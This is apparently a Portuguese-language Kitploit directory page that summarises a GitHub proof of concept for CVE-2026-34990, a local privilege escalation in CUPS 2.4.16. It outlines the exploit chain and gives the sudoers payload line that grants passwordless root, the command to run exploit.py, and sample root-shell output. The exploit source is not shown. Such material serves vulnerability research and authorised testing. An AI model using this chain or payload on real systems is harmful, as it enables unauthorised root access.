Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-34990-CUPS-LPE-PoC — PoC genérico para CVE-2026-34990 - Escalação de Privilégios Local no CUPS 2.4.16 via divulgação de token local e sobrescrita arbitrária de arquivo root. | Kitploit
Ferramentas/GitHubGitHub/noorkhalel/cve-2026-34990-cups-lpe-poc
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de Penetração
GitHubnoorkhalel/cve-2026-34990-cups-lpe-poc

CVE-2026-34990-CUPS-LPE-PoC

PoC genérico para CVE-2026-34990 - Escalação de Privilégios Local no CUPS 2.4.16 via divulgação de token local e sobrescrita arbitrária de arquivo root.

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
2há 2 diasAinda não revisado

CVE-2026-34990 | PoC de Escalação de Privilégios Local no CUPS

Uma prova de conceito genérica para CVE-2026-34990, uma vulnerabilidade de escalação de privilégios local que afeta o CUPS 2.4.16.

O exploit demonstra como um usuário local sem privilégios pode abusar da autenticação local do CUPS e do comportamento de configuração de impressoras para obter uma escrita arbitrária de arquivo como root e escalar privilégios.

Vulnerabilidade

  • CVE: CVE-2026-34990
  • Componente: CUPS
  • Versão Testada: CUPS 2.4.16
  • Tipo: Escalação de Privilégios Local
  • Impacto: Escrita arbitrária de arquivo como root
  • Versão Corrigida: CUPS 2.4.17

Crédito da Vulnerabilidade

A CVE-2026-34990 foi originalmente reportada por:

Asim Viladi Oglu Manizada (@manizada)

Eu não sou o descobridor desta vulnerabilidade.

Este repositório contém minha implementação de prova de conceito adaptada e testada, com base em informações técnicas divulgadas publicamente.

Como Funciona

Em alto nível, a cadeia de exploração é:

Usuário local sem privilégios
        |
        v
Criar impressora CUPS temporária
        |
        v
Acionar autenticação IPP de saída
        |
        v
Capturar token Authorization: Local
        |
        v
Reutilizar token contra operações privilegiadas do CUPS
        |
        v
Criar/persistir impressora file://
        |
        v
Enviar trabalho de impressão
        |
        v
Escrita arbitrária de arquivo com proprietário root
        |
        v
Escalação de privilégios

O PoC usa automaticamente o nome de usuário local atual.

Por exemplo, quando executado como:

alice

o payload de demonstração tem como alvo:

/etc/sudoers.d/alice-pwn

e tenta escrever:

alice ALL=(ALL) NOPASSWD: ALL

Um exploit bem-sucedido pode então ser verificado com:

sudo -n id

Exemplo:

uid=0(root) gid=0(root) groups=0(root)

Requisitos

O PoC espera:

  • Linux
  • Python 3
  • Instalação vulnerável do CUPS
  • ipptool
  • lp
  • lpstat
  • Acesso local ao agendador do CUPS

Verifique a versão do CUPS:

cups-config --version

Verifique se o agendador está em execução:

lpstat -r

Verifique o listener local do CUPS:

ss -lnt | grep 631

Uso

Clone o repositório:

git clone https://github.com/Noorkhalel/CVE-2026-34990-CUPS-LPE-PoC.git
cd CVE-2026-34990-CUPS-LPE-PoC

Execute:

python3 exploit.py

Exemplo de saída:

[*] user: <local-user>
[*] target: /etc/sudoers.d/<local-user>-pwn

[+] Local token: <LOCAL_TOKEN>

[*] attempt 1: <printer-name>

[+] ROOT via sudoers
uid=0(root) gid=0(root) groups=0(root)

[*] next: sudo -n bash

Após a exploração bem-sucedida:

sudo -n bash

Escopo

Este PoC foi intencionalmente escrito como uma implementação genérica da CVE divulgada publicamente.

Ele não contém:

  • Informações específicas de CTF
  • Informações de plataformas de treinamento
  • Nomes de máquinas
  • Credenciais
  • Flags
  • Endereços IP de alvo
  • Segredos específicos de ambiente

Aviso Legal

Este código é fornecido para:

  • Pesquisa de segurança
  • Reprodução de vulnerabilidades
  • Testes defensivos
  • Propósitos educacionais
  • Testes de penetração autorizados

Use este código apenas em sistemas que você possui ou em sistemas para os quais você tem autorização explícita.

O autor não é responsável pelo uso indevido deste software.

Créditos

Descoberta da vulnerabilidade:
Asim Viladi Oglu Manizada (@manizada)

Adaptação do PoC, testes e documentação:
Noor Khalil

Referências

  • CVE-2026-34990
  • OpenPrinting CUPS
  • OpenPrinting Security Advisory - GHSA-c54j-2vqw-wpwp
Baixar ferramenta